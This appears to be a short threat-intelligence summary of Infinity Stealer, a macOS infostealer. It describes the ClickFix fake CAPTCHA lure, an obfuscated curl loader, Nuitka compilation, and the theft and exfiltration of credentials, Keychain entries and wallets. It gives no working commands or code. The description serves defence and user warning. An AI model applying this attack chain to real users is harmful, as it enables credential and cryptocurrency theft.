A new info-stealing campaign called Infinity Stealer targets macOS by delivering a Python payload compiled into a native executable with the Nuitka compiler and lures users via a ClickFix fake Cloudflare CAPTCHA. The payload performs anti-analysis checks, harvests browser credentials, macOS Keychain entries, cryptocurrency wallets and plaintext developer secrets, and exfiltrates data to a C2 via HTTP while notifying operators via Telegram; users should never paste unknown commands into Terminal. #InfinityStealer #Nuitka
Keypoints
- Infinity Stealer targets macOS with a Python payload compiled into a native binary using Nuitka.
- Attackers use a ClickFix fake Cloudflare CAPTCHA and a base64-obfuscated curl command to trick users into executing a Bash loader.
- The Nuitka-built Mach-O loader contains a zstd-compressed archive that extracts the UpdateHelper.bin infostealer.
- The malware performs anti-analysis checks and can steal browser credentials, macOS Keychain entries, cryptocurrency wallets, screenshots, and plaintext developer secrets.
- Stolen data is exfiltrated via HTTP POST to a C2 and operators receive Telegram notifications; users should never paste unknown Terminal commands.